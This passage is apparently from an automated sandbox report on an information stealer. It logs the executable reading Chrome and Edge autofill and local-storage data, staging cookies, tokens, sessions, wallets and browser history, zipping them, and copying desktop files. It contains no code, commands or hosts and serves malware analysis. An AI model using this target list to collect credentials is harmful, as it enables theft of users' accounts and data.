                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Games VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Sessions VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Tokens VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Display (1).png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Display (1).png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\network_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\process_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\system_info.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Cookies.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0\Wallets VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.zip VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\BJZFPPWAPT.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\BNAGMGSPLO.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\BNAGMGSPLO.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\DUUDTUBZFW.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\DUUDTUBZFW.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EEGWXUHVUG.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EEGWXUHVUG.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EEGWXUHVUG.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EFOYFBOLXA.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\EIVQSAOTAQ.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\GRXZDKKVDB.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\GRXZDKKVDB.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\KLIZUSIQEN.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\KLIZUSIQEN.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PIVFAGEAAV.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PIVFAGEAAV.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\PWCCAWLGRE.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SQSJKEBWDT.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SUAVTZKNFL.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\Desktop\SUAVTZKNFL.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\EWZCVGNOWT VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV\DUUDTUBZFW.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\DUUDTUBZFW.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\EEGWXUHVUG.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\EIVQSAOTAQ.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV\GRXZDKKVDB.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\GRXZDKKVDB.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV\KLIZUSIQEN.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\KLIZUSIQEN.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PIVFAGEAAV\PIVFAGEAAV.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\BNAGMGSPLO.jpg VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE\EEGWXUHVUG.mp3 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PIVFAGEAAV.pdf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\PWCCAWLGRE.docx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\SQSJKEBWDT.png VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BJZFPPWAPT.png VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\scriptkidFILES\SUAVTZKNFL VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL\EEGWXUHVUG.pdf VolumeInformationJump to behavior
